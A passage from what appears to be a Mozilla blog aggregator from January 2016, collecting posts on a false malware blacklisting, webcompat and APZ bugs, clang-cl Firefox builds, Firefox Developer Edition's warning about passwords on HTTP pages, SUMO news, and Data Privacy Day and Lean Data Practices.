  1. during my morning, two users reported that their browser did not let them reach the downloads section of without a security warning. I could not see it myself from here, whatever the browser or the platform.
  2. during the evening, I could see the warning using Chrome on OS X
  3. apparently, and if I believe the "Search Console", Google thought two files in my web repository of releases are infected. I launched a complete verification of the whole web site and ran all the software releases through three anti-virus systems (Sophos, Avast and AVG) and an anti-adware system. Nothing at all to report. No infection, no malware, no adware, nothing.
  4. since this was my only option, I deleted the two reported files from my server. Just for the record, the timestamps were unchanged, and I even verified the files were precisely the ones I uploaded in january and april 2012. Yes, 2012... Yesterday, without being touched/modified in any manner during the last four years, they were erroneously reported infected.
  5. this morning, Firefox also reports a security warning on most large sections of and its Downloads section. I guess Firefox is also using the Google blacklist. Just for the record, both Spamhaus and CBL have nothing to say about
  6. the Google Search Console now reports my site is ok but Firefox still reports it unsecure, ahem.

I need to draw a few conclusions here:

  • Google does not tell you how the reported files are unsecure, which is really lame. The online tool they provide to "analyze" a web site did not help at all.
  • Since all my antivir/antiadware declared all files in my repo clean, I had absolutely no option but to delete the files that are now missing from my repo
  • two reported files in and led to blacklisting of all of and that's hundreds of files... Hey guys, we are and you are programmers, right? Sure you can do better than that?
  • during more than one day, customers fled from because of these security warnings, security warnings I consider as fake reports. Since no public antimalware app could find anything to say about my files, I am suspecting a fake report of human origin. How such a report can reach the blacklist when files are reported safe by four up-to-date antimalware apps and w/o infection information reported to the webmaster is far beyond my understanding.
  • blacklists are a tool that can be harmful to businesses if they're not well managed.

Update: oh I and forgot one thing: during the evening, blacklisted one of the Mail Transport Agents of Dreamhost. Not, my email address, that whole SMTP gateway at Dreamhost... So all my emails to one of my customers bounced and I can't even let her know some crucial information. I suppose thousands at Dreamhost are impacted. I reported the issue to both Earthlink and DH, of course.

Karl Dubost[worklog] APZ bugs, Some webcompat bugs and HTTP Refresh

Monday, January 25, 2016. It's morning in Japan. The office room temperature is around 3°C (37.4F). I just put on the Aladdin. The sleep was short or more exactly interrupted a couple of times. Let's go through emails after two weeks away.

My tune for WebCompat for this first quarter 2016 is Jurassic 5 - Quality Control.

MFA (Multi Factor Authentication)

Multi Factor Authentication in the computing industry is sold as something easier and more secure. I still have to be convinced about the easier part.

WebCompat Bugs

  • Bugzilla Activity
  • Github Activity
  • In Bug 1239922, Google Docs is sending HiRes icons only to WebKit devices because of a mediaqueries @media screen and (-webkit-min-device-pixel-ratio:2) {} in the CSS. One difference is that the images are set through content outside of the mediaquery on a pseudo-element, but inside directly on the element itself. It is currently a non-standard feature as explained by Daniel Holbert. We contacted them. A discussion has been started and the magical Daniel dived a bit more in the issue. Read it.
  • Google Search seems to have ditched the opensearch link in the HTML head. As a result, users have more difficult to add the search for specific locales. Contacted.
  • Google Custom Search is not sending the same search results links to Firefox Desktop and iOS9 on one side than Firefox Android. Firefox Android receives instead of This is unfortunate because is a 404.
  • DeKlab is sending some resources (a template for Dojo) with a bogus BOM. Firefox is stricter than Chrome on this and rejects the document, which in return breaks the application. Being stricter is cool and the site should be contacted, but at the same time, the pressure of it working in Chrome makes it harder to convince devs.
  • When creating a set of images for srcset, make absolutely sure that your images are actually on the server.
  • Some bugs are harder to test than others. is not accessible from Japan. Maybe it's working from USA. If someone can test for us.
  • When mixing em and px in a design you always risk that the fonts and rounding of values will not be exactly the same in all browsers.
  • There is an interesting bug with Font being truncated on twitter differently on linux and other platforms and this depending on the fonts. Boris Zbarsky suspect that twitter plays somehow with the font. I started to dig to extract more information.
  • Strange issue on a 360 video not playing in IceWeasel. This seems related specifically to the Debian version.
  • Some of the bugs we had with Japanese Web sites are being fixed, silently as usual. Once we reached out, not always the person will tell us back, hey we deployed a fix.
  • A developer is working on a Web site and he feels the need because of a performance, feature issue to create a script to block a specific user-agent string. Time passes. We analyze. Find the contact information given on the site. Try to contact and don't get any answers. We try to contact again this time on twitter. And the person replies that he is not working anymore there so can't fix the user agent sniffing. Apart of the frustration that it creates, you can see how user agent sniffing strategy is broken, it doesn't take evolution of implementations and human changes in consideration. User agent sniffing may work but it is a very high maintenance choice with consequences on a long term. It's not a zero cost.

APZ Bugs

There's a list of scrolling bugs which affects Firefox. The issue is documented on MDN.

These effects work well in browsers where the scrolling is done synchronously on the browser's main thread. However, most browsers now support some sort of asynchronous scrolling in order to provide a consistent 60 frames per second experience to the user. In the asynchronous scrolling model, the visual scroll position is updated in the compositor thread and is visible to the user before the scroll event is updated in the DOM and fired on the main thread. This means that the effects implemented will lag a little bit behind what the user sees the scroll position to be. This can cause the effect to be laggy, janky, or jittery — in short, something we want to avoid.

So if you know someone (or a friend of a friend) who is able to fix or put us in contact with one of these APZ bugs site owners, please tell us in the bugs comments or on IRC (#webcompat on I did a first pass at bugs triage for contacting the site.

Some of these bugs are not mature yet in terms of outreach status. With Addons/e10s and APZ, it might happen more often that the Web Compat team is contacted for reaching out the sites which have quirks, specific code hindering Firefox, etc. But to reach out a Web site requires first a couple of steps and understanding. I need to write something about this. Added to my TODO list.

Addons e10s

Difficult to make progress in some cases, because the developers have completely disappeared. I wonder in some cases if it would not just be better to complete remove it from the addons list. It would both give the chance to someone else to propose something if needed by users (nature doesn't like void) or/and the main developer to wake up and wonder why the addon is not downloadable anymore.

Webcompat Life

We had a We discuss about APZ, WebCompat wiki, Firefox OS Tier3 and WebkitCSS bugs status.

Pile of mails

  • Around 1000 emails after 2 weeks, this is not too bad. I dealt in priority with those where my email address is directly in the To: field (dynamic mailbox), then the ones where I'm in needinfo in Bugzilla, then finally the ones which are addressed to specific mailing-lists I have work to do. The rest, rapid scann of the topics (Good email topics are important. Remember!) and marking as read all the ones that I don't have any interests. I'm almost done in one day with all these emails.

HTTP Refresh


  • explain what is necessary to consider a bug "ready for outreach".
  • check the webkitcss bugs we had in Bugzilla and
  • check if the bugs still open about Firefox OS are happening on Firefox Android
  • testing Google search properties and see if we can find a version which is working better on Firefox Android than the current default version sent by Google. Maybe testing with Chrome UA and Iphone UA.


Andy McKayWhy I closed your bug

Because I'm mean. Well not really, but I understand how it can feel that way.

Web sites at Mozilla have a unique advantage in that they are open source. That is great for development and contributions. Although the number of contributions tends to be lower than for Firefox and other projects [1].

Just like Firefox anyone can file a bug and anyone can send in a patch. Which is truly awesome and for the last 10+ years AMO has had some excellent contributors as well as paid staff help it out. Except for a few basic problems:

  • There are always new features, new edge cases, new problems to be solved.

  • Each new feature spawns new bugs.

  • Each new feature interacts with other features to become more and more complex.

  • The number of bugs on the site grows to overwhelming proportions given time.

  • The maintenance burden grows and grows until no new features can be added without getting more resources.

This is probably a familiar cycle to many. In open source projects you can fork and take your project off in a different direction. In the case of AMO though you really can't in that there's only one such site for Firefox.

And there in we get to the dilemma. At Mozilla we've gone through various phases of support for AMO from paid contributors: from lots of developers, to none, to one, to lots of developers.

The one continual theme in all of them, the number of features and bugs just keeps growing and to get more done we need more and more people.

So let's return to that bug you've filed asking for something on AMO. We'll think quite unsurprisingly of things like:

  • Will it add complexity or remove it?

  • What are the long term maintenance and security issues?

  • Will it be used?

...that shouldn't be too much of a surprise. But that might mean that we won't take that bug, or pull request, and then you'll think we are mean.

In the past I've seen bugs triaged to be "P5 Enhancement" (or maybe even "good first bug" or "patches welcome"), this is just a cop out. Basically we don't want to work on this so we are going to ignore it, we know that you don't really want to work on the feature either and it sits in limbo. I'd rather be up front and close it.

The only way we can make a site like AMO maintainable is by keeping the complexity and feature set down. After all, there's a lot of work to be done around add-ons, the more we can keep the complex things simple, the more we can do.

[1] Citation needed.

Ehsan AkhgariBuilding Firefox With clang-cl: A Status Update

Last June, I wrote about enabling building Firefox with clang-cl.  We didn’t get these builds up on the infrastructure and things regressed on both the Mozilla and LLVM side, and we got to a state where clang-cl either wouldn’t compile Firefox any more, or the resulting build would be severely broken.  It took us months but earlier today we finally managed to finally get a full x86-64 Firefox build with clang-cl!  The build works for basic browsing (except that it crashes on for reasons we haven’t diagnosed yet) and just for extra fun, I ran all of our service worker tests (which I happen to run many times a day on other platforms) and they all passed.

This time, we got to an impressive milestone.  Previously, we were building Firefox with the help of clang-cl’s fallback mode (which falls back to MSVC when clang fails to build a file for whatever reason) but this time we have a build of Firefox that is fully produced with clang, without even using the MSVC compiler once.  And that includes all of our C++ tests too.  (Note that we still use the rest of the Microsoft toolchain, such as the linker, resource compiler, etc. to produce the ultimate binaries; I’m only focusing on C and C++ compilation in this post.)

We should now try to keep these builds working.  I believe that this is a big opportunity for Firefox to be able to leverage the modern toolchain that we have been enjoying on other platforms on Windows, where we have most of our users.  An open source compilation toolchain has long been needed on Windows, and clang-cl is the first open source replacement that is designed to be a drop-in replacement for MSVC, and that makes it an ideal target for Firefox.  Also, Microsoft’s recent integration of clang as a front-end for the MSVC code generator promises the prospects of switching to clang/C2 in the future as our default compiler on Windows (assuming that the performance of our clang-cl builds don’t end up being on par with the MSVC PGO compiler.)

My next priority for this project would be to stand up Windows static analysis builds on TreeHerder.  That requires getting our clang-plugin to work on Windows, fixing the issues that it may find (since that would be the first time we would be running our static analyses on Windows!), and trying to get them up and running on TaskCluster.  That way we would be able to leverage our static analysis on Windows as the first fruit of this effort, and also keep these builds working in the future.  Since clang-cl is still being heavily developed, we will be preparing periodic updates to the compiler, potentially fixing the issues that may have been uncovered in either Firefox or LLVM and therefore we will keep up with the development in both projects.

Some of the future things that I think we should look into, sorted by priority:

  • Get DXR to work on Windows.  Once we port our static analysis clang plugin to Windows, the next logical step would be to get the DXR indexer clang plugin to work on Windows, so that we can get a DXR that works for Windows specific code too.
  • Look into getting these builds to pass our test suites.  So far we are at a stage where clang-cl can understand all of our C and C++ code on Windows, but the generated code is still not completely correct.  Right now we’re at such an early stage that one can find crashes etc within minutes of browsing.  But we need to get all of our tests to pass in these builds in order to get a rock-solid browser built with clang-cl.  This will also help the clang-cl project, since we have been reporting clang-cl bugs that the Firefox code has continually uncovered, and on occasions also fixes to those bugs.  Although the rate of the LLVM side issues has decreased dramatically as the compiler has matured, I expect to find LLVM bugs occasionally, and hope to continue to work with the LLVM project to resolve them.
  • Get the clang-based sanitizers to work on Windows, to extend their coverage to Windows.  This includes things such as AddressSanitizer, ThreadSanitizer, LeakSanitizer, etc.  The security team has been asking for AddressSanitizer for a long time.  We could definitely benefit from the Windows specific coverage of all of these tools.  Obviously the first step is to get a solid build that works.  We have previously attempted to use AddressSanitizer on Windows but we have run into a lot of AddressSanitizer specific issues that we had to fix on both sides.  These efforts have been halted for a while since we have been focusing on getting the basic compilation to work again.
  • Start to do hybrid builds, where we randomly pick either clang-cl or MSVC o build each individual file.  This is required to improve clang-cl’s ABI compatibility.  The reason that is important is that compiler bugs in a lot of cases represent themselves as hard to explain artifacts in the functionality, anything from a random crash somewhere where everything should be working fine, to parts of the rendering going black for unclear reasons.  A cost effective way to diagnose such issues is getting us to a point where we can mix and match object files produced by either compilers to get a correct build, and then bisect between the compilers to find the translation unit that is being miscompiled, and then keep bisecting to find the function (and sometimes the exact part of the code) that is being miscompiled.  This is basically impractical without a good story for ABI compatibility in clang-cl.  We have recently hit a few of these issues.
  • Improving support for debug information generation in LLVM to a point that we can use Breakpad to generate crash stacks for crash-stats.  This should enable us to advertise these builds to a small community of dogfooders.
  • Start to look at a performance comparison between clang-cl and MSVC builds.  This plus the bisection infrastructure I touched on above should generate a wealth of information on performance issues in clang-cl, and then we can fix them with the help of the LLVM community.  Also, in case the numbers aren’t too far apart, maybe even ship one Firefox Nightly for Windows built with clang-cl, as a milestone!  :-)

Longer term, we can look into issues such as helping to add support for full debug information support, with the goal of making it possible to use Visual Studio on Windows with these builds.  Right now, we basically debug at the assembly level.  Although facilitating this will probably help speed up development too, so perhaps we should start on it earlier.   There is also LLDB on Windows which should in theory be able to consume the DWRAF debug information that clang-cl can generate similar to how it does on Linux, so that is worth looking into as well. I’m sure there are other things that I’m not currently thinking of that we can do as well.

Last but not least, this has been a collaboration between quite a few people, on the Mozilla side, Jeff Muizelaar, David Major, Nathan Froyd, Mike Hommey, Raymond Forbes and myself, and on the LLVM side many members of the Google compiler and Chromium teams: Reid Kleckner, David Majnemer, Hans Wennborg, Richard Smith, Nico Weber, Timur Iskhodzhanov, and the rest of the LLVM community who made clang-cl possible.  I’m sure I’m forgetting some important names.  I would like to appreciate all of these people’s help and effort.

Air MozillaPrivacy Lab - Privacy for Startups - January 2016

Privacy Lab - Privacy for Startups - January 2016 Privacy for Startups: Practical Guidance for Founders, Engineers, Marketing, and those who support them Startups often espouse mottos that make traditional Fortune 500 companies cringe....

Tanvi VyasNo More Passwords over HTTP, Please!

Firefox Developer Edition 46 warns developers when login credentials are requested over HTTP.

Username and password pairs control access to users’ personal data. Websites should handle this information with care and only request passwords over secure (authenticated and encrypted) connections, like HTTPS. Unfortunately, we too frequently see non-secure connections, like HTTP, used to handle user passwords. To inform developers about this privacy and security vulnerability, Firefox Developer Edition warns developers of the issue by changing the security iconography of non-secure pages to a lock with a red strikethrough.

Firefox Developer Edition 46+ shows a lock with a red strikethrough on non-secure pages that have a password field, while Firefox Release does include that additional iconography

How does Firefox determine if a password field is secure or not?

Firefox determines if a password field is secure by examining the page it is embedded in. The embedding page is checked against the algorithm in the W3C’s Secure Contexts Specification to see if it is secure or non-secure. Anything on a non-secure page can be manipulated by a Man-In-The-Middle (MITM) attacker. The MITM can use a number of mechanisms to extract the password entered onto the non-secure page. Here are some examples:

      • Change the form action so the password submits to an attacker controlled server instead of the intended destination. Then seamlessly redirect to the intended destination, while sending along the stolen password.
      • Use javascript to grab the contents of the password field before submission and send it to the attacker’s server.
      • Use javascript to log the user’s keystrokes and send them to the attacker’s server.

Note that all of the attacks mentioned above can occur without the user realizing that their account has been compromised.

Firefox has been alerting developers of this issue via the Developer Tools Web Console since Firefox 26.

Why isn’t submitting over HTTPS enough? Why does the page have to be HTTPS?

We get this question a lot, so I thought I would call it out specifically. Although transmitting over HTTPS instead of HTTP does prevent a network eavesdropper from seeing a user’s password, it does not prevent an active MITM attacker from extracting the password from the non-secure HTTP page. As described above, active attackers can MITM an HTTP connection between the server and the user’s computer to change the contents of the webpage. The attacker can take the HTML content that the site attempted to deliver to the user and add javascript to the HTML page that will steal the user’s username and password. The attacker then sends the updated HTML to the user. When the user enters their username and password, it will get sent to both the attacker and the site.

What if the credentials for my site really aren’t that sensitive?

Sometimes sites require username and passwords, but don’t actually store data that is very sensitive. For example, a news site may save which news articles a user wants to go back and read, but not save any other data about a user. Most users don’t consider this highly sensitive information. Web developers of the news site may be less motivated to secure their site and their user credentials. Unfortunately, password reuse is a big problem. Users use the same password across multiple sites (news sites, social networks, email providers, banks). Hence, even if access to the username and password to your site doesn’t seem like a huge risk to you, it is a great risk to users who have used the same username and password to login to their bank accounts. Attackers are getting smarter; they steal username/password pairs from one site, and then try reusing them on more lucrative sites.

How can I remove this warning from my site?

Put your login forms on HTTPS pages.

Of course, the most straightforward way to do this is to move your whole website to HTTPS. If you aren’t able to do this today, create a separate HTTPS page that is just used for logins. Whenever a user wants to login to your site, they will visit the HTTPS login page. If your login form submits to an HTTPS endpoint, parts of your domain may already be set up to use HTTPS.

In order to host content over HTTPS, you need a TLS Certificate from a Certificate Authority. Let’s Encrypt is a Certificate Authority that can issue you free certificates. You can reference these pages for some guidance on configuring your servers.

What can I do if I don’t control the webpage?

We know that users of Firefox Developer Edition don’t only use Developer Edition to work on their own websites. They also use it to browse the net. Developers who see this warning on a page they don’t control can still take a couple of actions. You can try to add “https://” to the beginning of the url in the address bar and see if you are able to login over a secure connection to help protect your data. You can also try and reach out to the website administrator and alert them of the privacy and security vulnerability on their site.

Do you have examples of real life attacks that occurred because of stolen passwords?

There are ample examples of password reuse leading to large scale compromise. There are fewer well-known examples of passwords being stolen by performing MITM attacks on login forms, but the basic techniques of javascript injection have been used at scale by Internet Service Providers and governments.

Why does my browser sometimes show this warning when I don’t see a password field on the page?

Sometimes password fields are in a hidden <div> on a page, that does not show up without user interaction. We have a bug open to detect when a password field is visible on the page.

Will this feature become available to Firefox Beta and Release Users?

Right now, the focus for this feature is on developers, since they’re the ones that ultimately need to fix the sites that are exposing users’ passwords. In general, though, since we are working on deprecating non-secure HTTP in the long run, you should expect to see more and more explicit indications of when things are not secure. For example, in all current versions of Firefox, the Developer Tools Network Monitor shows the lock with a red strikethrough for all non-secure HTTP connections.

How do I enable this warning in other versions of Firefox?

Users of Firefox version 44+ (on any branch) can enable or disable this feature by following these steps:

      1. Open a new window or tab in Firefox.
      2. Type about:config and press enter.
      3. You will get to a page that asks you to promise to be careful. Promise you will be.
      4. The value of the security.insecure_password.ui.enabled preference determines whether or not Firefox warns you about non-secure login pages. You can enable the feature and be warned about non-secure login pages by setting this value to true. You can disable the feature by setting the value to false.

Thank you!

A special thanks to Paolo Amadini and Aislinn Grigas for their implementation and user experience work on this feature!

Support.Mozilla.OrgWhat’s up with SUMO – 28th January

Hello, SUMO Nation!

Starting from this week, we’re moving things around a bit (to keep them fresh and give you more time to digest and reply. The Friday posts are moving to Thursday, and Fridays will be open for guest posts (including yours) – if you’re interested in writing a post for this blog, let me know in the comments.

Welcome, new contributors!

If you just joined us, don’t hesitate – come over and say “hi” in the forums!

Contributors of the week

We salute you!

Don’t forget that if you are new to SUMO and someone helped you get started in a nice way you can nominate them for the Buddy of the Month!

Most recent SUMO Community meeting

The next SUMO Community meeting…

  • is happening on Monday the 1st of February – join us!
  • Reminder: if you want to add a discussion topic to the upcoming meeting agenda:
    • Start a thread in the Community Forums, so that everyone in the community can see what will be discussed and voice their opinion here before Monday (this will make it easier to have an efficient meeting).
    • Please do so as soon as you can before the meeting, so that people have time to read, think, and reply (and also add it to the agenda).
    • If you can, please attend the meeting in person (or via IRC), so we can follow up on your discussion topic during the meeting with your feedback.




Support Forum

  • Today (was/is/will still be for a few hours) a SUMO Day, connected to the release week for Version 44. Keep answering those questions, heroes of the helpful web!

Knowledge Base



  • for Android
    • It’s the Firefox 44 Release Week! Forum talk about the release.
    • Draft release notes are here.
    • This is a staged rollout using Google Play, addressing the crash rate discussions
    • IMPORTANT: Android OS versions 3.0 – 3.2.6 (Honeycomb) won’t be supported in a future release of Firefox for Android; when this happens the app will not be visible on the Google Play Store for users of these OS versions. When we have a more definite time frame for this we will publish another post.
  • for iOS
    • 2.0 is still under wraps – thank you for your patience!

That’s it for today, dear SUMOnians! We still have Friday to enjoy, so see you around SUMO and not only… tomorrow!

Air MozillaWeb QA Weekly Meeting, 28 Jan 2016

Web QA Weekly Meeting This is our weekly gathering of Mozilla'a Web QA team filled with discussion on our current and future projects, ideas, demos, and fun facts.

Air MozillaReps weekly, 28 Jan 2016

Reps weekly This is a weekly call with some of the Reps to discuss all matters about/affecting Reps and invite Reps to share their work with everyone.

Mark SurmanInspired by our grassroots leaders

Last weekend, I had the good fortune to attend our grassroots Leadership Summit in Singapore: a hands on learning and planning event for leaders in Mozilla’s core contributor community.


We’ve been doing these sorts of learning / planning / doing events with our broader community of allies for years now: they are at the core of the Mozilla Leadership Network we’re rolling out this year. It was inspiring to see the participation team and core contributor community dive in and use a similar approach.

I left Singapore feeling inspired and hopeful — both for the web and for participation at Mozilla. Here is an email I sent to everyone who participated in the Summit explaining why:

As I flew over the Pacific on Monday night, I felt an incredible sense of inspiration and hope for the future of the web — and the future of Mozilla. I have all of you to thank for that. So, thank you.

This past weekend’s Leadership Summit in Singapore marked a real milestone: it was Mozilla’s first real attempt at an event consciously designed to help our core contributor community (that’s you!) develop important skills like planning and dig into critical projects in areas like connected devices and campus outreach all at the same time. This may not seem like a big deal. But it is.

For Mozilla to succeed, *all of us* need to get better at what we do. We need to reach and strive. The parts of the Summit focused on personality types, planning and building good open source communities were all meant to serve as fuel for this: giving us a chance to hone skills we need.

Actually getting better comes by using these skills to *do* things. The campus campaign and connected devices tracks at the Summit were designed to make this possible: to get us all working on concrete projects while applying the skills we were learning in other sessions. The idea was to get important work done while also getting better. We did that. You did that.

Of course, it’s the work and the impact we have in the world that matter most. We urgently need to explore what the web — and our values — can mean in the coming era of the internet of things. The projects you designed in the connected devices track are a good step in this direction. We also need to grow our community and get more young people involved in our work. The plans you made for local campus campaigns focused on privacy will help us do this. This is important work. And, by doing it the way we did it, we’ve collectively teed it up to succeed.

I’m saying all this partly out of admiration and gratitude.  But I’m also trying to highlight the underlying importance of what happened this past weekend: we started using a new approach to participation and leadership development. It’s an approach that I’d like to see us use even more both with our core participation leaders (again, that’s you!) and with our Mozilla Leadership Network (our broader network of friends and allies). By participating so fully and enthusiastically in Singapore, you helped us take a big step towards developing this approach.

As I said in my opening talk: this is a critical time for the web and for Mozilla. We need to simultaneously figure out what technologies and products will bring our values into the future and we need to show the public and governments just how important those values are. We can only succeed by getting better at working together — and by growing our community around the world. This past weekend, you all made a very important step in this direction. Again, thank you.

I’m looking forward to all the work and exploration we have ahead. Onwards!

As I said in my message, the Singapore Leadership Summit is a milestone. We’ve been working to recast and rebuild our participation team for about a year now. This past weekend I saw that investment paying off: we have a team teed up to grow and support our contributor community from around the world. Nicely done! Good things ahead.

The post Inspired by our grassroots leaders appeared first on Mark Surman.

Nathan Froydfor-purpose instead of non-profit

I began talking with a guy in his midforties who ran an investment fund and told me about his latest capital raise. We hit it off while discussing the differences between start-ups on the East and West Coasts, and I enjoyed learning about how he evaluated new investment opportunities. Although I’d left that space a while ago, I still knew it well enough to carry a solid conversation and felt as if we were speaking the same language. Then he asked what I did.

“I run a nonprofit organization called Pencils of Promise.”

“Oh,” he replied, somewhat taken aback. “And you do that full-time?”

More than full-time, I thought, feeling a bit judged. “Yeah, I do. I used to work at Bain, but left to work on the organization full-time.”

“Wow, good for you,” he said in the same tone you’d use to address a small child, then immediately looked over my shoulder for someone new to approach…

On my subway ride home that night I began to reflect on the many times that this scenario had happened since I’d started Pencils of Promise. Conversations began on an equal footing, but the word nonprofit could stop a discussion in its tracks and strip our work of its value and true meaning. That one word could shift the conversational dynamic so that the other person was suddenly speaking down to me. As mad as I was at this guy, it suddenly hit me. I was to blame for his lackluster response. With one word, nonprofit, I had described my company as something that stood in stark opposition to the one metric that his company was being most evluated by. I had used a negative word, non, to detail our work when that inaccurately described what we did. Our primary driver was not the avoidance of profits, but the abundance of social impact…

That night I decided to start using a new phrase that more appropriately labeled the motivation behind our work. By changing the words you use to describe something, you can change how other perceive it. For too long we had allowed society to judge us with shackling expectations that weren’t supportive of scale. I knew that the only way to win the respect of our for-profit peers would be to wed our values and idealism to business acumen. Rather than thinking of ourselves as nonprofit, we would begin to refer to our work as for-purpose.

From The Promise of a Pencil by Adam Braun.

The Mozilla BlogIt’s International Data Privacy Day: Help us Build a Better Internet

Update your Software and Share the Lean Data Practices

Today is International Data Privacy Day. What can we all do to help ourselves and each other improve privacy on the Web? We have something for everyone:

  • Users can greatly improve their own data privacy by simply updating their software.
  • Companies can increase user trust in their products and user privacy by implementing Lean Data Practices that increase transparency and offer user control.

By taking action on these two simple ideas, we can create a better Web together.

Why is updating important?

Updating your software is a basic but crucial step you can take to help increase your privacy and security online. Outdated software is one of the easiest ways for hackers to access your data online because it’s prone to vulnerabilities and security holes that can be exploited and that may have been patched in the updated versions. Updating can make your friends and family more secure because a computer that has been hacked can be used to hack others. Not updating software is like driving with a broken tail light – it might not seem immediately urgent, but it compromises your safety and that of people around you.

For our part, we’ve tried to make updating Firefox as easy as possible by automatically sending users updates by default so they don’t have to worry about it. Updates for other software may not come automatically, but they are equally important.

Once you complete your updates share the “I Updated” badge using #DPD2016 and #PrivacyAware and encourage your friends and family to update, too!

Why should companies implement Lean Data Practices?

Today we’re also launching a new way for companies and projects to earn user trust through a simple framework that helps companies think about the decisions they make daily about data. We call these Lean Data Practices and the three central questions that help companies work through are how can you stay lean, build in security and engage your users. The more companies and projects that implement these concepts, the more we as an industry can earn user trust. You can read more in this blog post from Mozilla’s Associate General Counsel Jishnu Menon.

As a nonprofit with a mission to promote openness, innovation and opportunity on the Web Mozilla is dedicated to putting users in control of their online experiences. That’s why we think about online privacy and security every day and have privacy principles that show how we build it into everything we do. All of us – users and businesses alike – can contribute to a healthy, safe and trusted Web. The more we focus on ways to reach that goal, the easier it is to innovate and keep the Web open and accessible to all. Happy International Data Privacy Day!

Mozilla Open Policy & Advocacy BlogIntroducing Lean Data Practices

At Mozilla, we believe that users trust products more when companies build in transparency and user control. Earned trust can drive a virtuous cycle of adoption, while conversely, mistrust created by even just a few companies can drive a negative cycle that can damage a whole ecosystem.

Today on International Data Privacy Day, we are happy to announce a new initiative aimed at assisting companies and projects of all sizes to earn trust by staying lean and being smart about collecting and using data.

We call these Lean Data Practices.


Lean Data Practices in action

Lean Data Practices are not principles, nor are they a way to address legal compliance— rather, they are a framework to help companies think about the decisions they make about data. They do not prescribe a particular outcome and can help even the smallest companies to begin building user trust by fostering transparency and user control.

We have designed Lean Data Practices to be simple and direct:

  1. stay lean by focusing on data you need,
  2. build in security appropriate to the data you have and
  3. engage your users to help them understand how you use their data.

We have even created a toolkit to make it easy to implement them.

We use these practices as a starting point for our own decisions about data at Mozilla. We believe that as more companies and projects use Lean Data Practices, the better they will become at earning trust and, ultimately, the more trusted we will all become as an industry.

Please check them out and help us spread the word!